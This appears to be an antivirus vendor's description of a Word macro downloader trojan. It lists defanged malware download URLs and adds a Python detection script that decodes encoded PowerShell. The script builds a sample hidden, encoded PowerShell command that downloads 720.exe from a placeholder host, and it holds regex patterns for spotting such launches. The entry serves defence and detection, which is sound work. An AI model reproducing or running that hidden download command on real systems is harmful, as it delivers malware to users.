VBA/Agent.MUV!tr.dldr
Analysis
VBA/Agent.MUV!tr.dldr is a generic detection for a trojan. Because the detection is generic, malware detected as VBA/Agent.MUV!tr.dldr may vary in behaviour.
Below are some of its observed characteristics and behaviours:
- It is a Microsoft Word macro.
- It builds a base64-encoded command and executes it via PowerShell with a hidden window.
- The PowerShell script attempts to connect to multiple sites to download a file named 720.exe.
- At the time this virus description was written (Jan. 14, 2020), the sites the malware connects to no longer supplied the executable.
- The malware attempts to connect to the following sites to download the executable:
  - hxxp://www.[REMOVED]-me.com/wp-admin/da5tfh48/
  - hxxp://www.ovi[REMOVED].com/mgs1/1jk0225/
  - hxxps://jasam[REMOVED].com/wp-content/gzv60154/
  - hxxps://www.mary[REMOVED].com/wp-content/brand/zgkb6/
  - hxxp://lua[REMOVED].org/calendar/7532946
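The launch chain described above (Word macro, base64-encoded PowerShell command, hidden window, fetch of 720.exe) is visible in process-creation telemetry. The following added example, which is not Fortinet's code and uses constructed sample command lines with an invalid placeholder domain, decodes the -EncodedCommand argument (base64 over UTF-16LE) and flags the combination of indicators a defender would hunt for:

```python
"""Triage process-creation command lines for the VBA/Agent.MUV-style
PowerShell launch: encoded command + hidden window + 720.exe download.
All sample inputs below are constructed for this example."""
import base64
import re
from typing import Optional

# PowerShell accepts abbreviated switches, so match the usual prefixes.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)[-/]w(?:indowstyle)?\s+hidden")
URL_RE = re.compile(r"(?i)https?://[^\s'\"]+")


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script, or None if no valid encoded argument."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def assess(cmdline: str, parent: str = "") -> dict:
    """Collect indicators; 'parent' is the parent process image path, if known."""
    decoded = decode_encoded_command(cmdline) or ""
    f = {
        "encoded_command": bool(decoded),
        "hidden_window": bool(HIDDEN_RE.search(cmdline)),
        "word_parent": parent.lower().endswith("winword.exe"),
        "drops_720_exe": "720.exe" in decoded.lower(),
        "download_urls": URL_RE.findall(decoded),  # feed these to blocklists
        "decoded": decoded,
    }
    # Encoded + hidden alone is worth a look; a Word parent or the 720.exe
    # artefact ties it to the chain this family was observed using.
    f["flagged"] = f["encoded_command"] and f["hidden_window"] and (f["word_parent"] or f["drops_720_exe"])
    return f


# Constructed samples (placeholder .invalid domain, not a real site).
SAMPLE_SCRIPT = "Invoke-WebRequest 'http://www.example.invalid/wp-content/x1/' -OutFile 720.exe"
SAMPLE_MALICIOUS = "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(SAMPLE_SCRIPT)
SAMPLE_BENIGN = "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"
```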
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine or delete files that are detected and replace infected files with clean backup copies.
Detection Availability
| Product |
|---|
| FortiGate |
| FortiClient |
| FortiAPS |
| FortiAPU |
| FortiMail |
| FortiSandbox |
| FortiWeb |
| Web Application Firewall |
| FortiIsolator |
| FortiDeceptor |
| FortiEDR |
Version Updates
| Date | Version | Detail |
|---|---|---|
| 2022-04-18 | 90.01507 | |
| 2021-08-24 | 88.00605 | |
| 2020-11-24 | 82.07300 | Sig Updated |
| 2020-11-24 | 82.06900 | Sig Updated |
| 2020-11-23 | 82.05300 | Sig Updated |
| 2020-11-17 | 81.90300 | Sig Updated |
| 2020-05-26 | 77.70500 | Sig Updated |
| 2019-11-27 | 73.37100 | Sig Updated |
| 2019-11-27 | 73.37000 | Sig Updated |
| 2019-11-26 | 73.35800 | Sig Updated |